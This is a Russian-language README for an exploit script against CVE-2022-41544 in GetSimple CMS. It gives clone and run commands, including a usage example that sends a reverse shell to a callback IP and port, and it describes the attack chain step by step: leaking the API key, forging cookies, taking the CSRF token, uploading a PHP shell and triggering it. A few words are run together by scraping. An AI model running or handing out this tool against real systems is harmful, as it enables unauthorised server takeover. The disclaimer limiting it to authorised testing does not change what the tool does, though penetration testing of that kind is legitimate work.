
Скрипт эксплойта на Python для CVE-2022-41544 в GetSimple CMS. Автоматизирует утечку ключей API, извлечение CSRF-токенов, загрузку PHP-шелла и запуск reverse shell для пентеста.
Этот репозиторий содержит скрипт для эксплуатации уязвимости CVE-2022-41544 в GetSimple CMS. Скрипт выполняет несколько шагов: проверяет наличие уязвимостей, извлекает ключи API, устанавливает cookies, получает CSRF-токены, загружает оболочку и запускает её.
telnetlib, так как он не был необходим для работы скрипта.Клонировать репозиторий:
git clone https://github.com/n3rdyn3xus/CVE-2022-41544.git
cd CVE-2022-41544
Установить зависимости: Убедитесь, что у вас установлен Python 3 и библиотека .
requestspip3 install requests
Запустить скрипт:
python3 CVE-2022-41544.py <target> <path> <ip:port> <username>
<target>: Целевой домен или IP-адрес.<path>: Путь к установке GetSimple CMS.<ip:port>: IP-адрес и порт для обратной оболочки.<username>: Имя администратора GetSimple CMS.Пример:
python3 CVE-2022-41544.py 10.129.42.249 /CMS 10.10.14.8:4444 admin


print_the_banner(): Отображает стилизованный баннер с использованием ASCII-арта.get_version(target, path): Проверяет, является ли целевая версия GetSimple CMS уязвимой.api_leak(target, path): Пытается получить ключ API из файла авторизации XML.set_cookies(username, version, apikey): Устанавливает cookies, необходимые для последующих запросов, на основе полученного ключа API.get_csrf_token(target, path, headers): Извлекает CSRF-токен, необходимый для загрузки оболочки.upload_shell(target, path, headers, nonce, shell_content): Загружает PHP-оболочку на целевой сервер.shell_trigger(target, path): Запускает загруженную оболочку для установки обратного соединения.Функция main() координирует весь процесс, последовательно вызывая вышеуказанные функции для эксплуатации уязвимости CVE-2022-41544.
Этот скрипт разработал h3x0v3rl0rd.
Этот скрипт предоставлен только в образовательных целях. Несанкционированный доступ к системам незаконен и неэтичен. Используйте этот скрипт ответственно и только на системах, на которые у вас есть явное разрешение на тестирование.
Этот проект лицензирован по лицензии MIT — подробности см. в файле LICENSE.